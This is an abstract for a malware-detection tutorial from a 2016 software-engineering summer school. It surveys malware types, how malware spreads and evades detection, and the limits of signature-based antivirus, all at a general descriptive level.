Malware Detection

A tutorial on malware detection presented at the 12th International Summer School on Software Engineering, June 13 - 16, 2016 University of Salerno, Italy -
Malware is software that is designed to cause harm by, for example, gaining access to private computer systems, stealing sensitive information, infecting files on the system, or spreading its infection. To avoid such malicious activity, malware must be detected and removed from a computer system. The volume of malware is constantly growing at an impressive pace. The AV-Test institute registers 390,000 new malware every day, and only in 2014 140 millions of new malicious programs were found.

Not only personal computers, but also mobile devices are targeted by malware. With their increasing power, these devices represent now a widely used way to access the web and cloud resources. The growth rate in new mobile malware is far greater than the growth rate of new malware targeting PCs. Malware is evolving both in the method of infection and in the evasion techniques. Social engineering is heavily used to distribute malicious link or files that contains Trojans or malware installers. Mobile apps are also exploited for diffusing malware by three main methods: repackaging, attack upgrade, and drive-by downloads. 

Current antimalware are mostly signature-based: this approach requires that the vendor be aware of the malware, in order to identify the signature and send out updates regularly. Signatures have traditionally been in the form of fixed strings and regular expressions. Using signature-based detection, a threat must be widespread for being successfully recognized. In addition, there exist several techniques to allow malware to evade signature detection, for instance trivial changes in the code are usually enough, e.g., the variables renaming into the malware code, as demonstrated in literature. 

In this tutorial we will illustrate different types of malware, in terms of mechanisms of infection, kinds of payload used, and adopted evasion techniques. We will discuss the limitations of the current antimalware solutions, and the pros and cons of the cutting edge research antimalware techniques that are emerging in literature. We will draw an appraisal about how to fill the gap between antimalware technology and malware technology, not only in terms of software tools, but also in terms of culture and knowledge.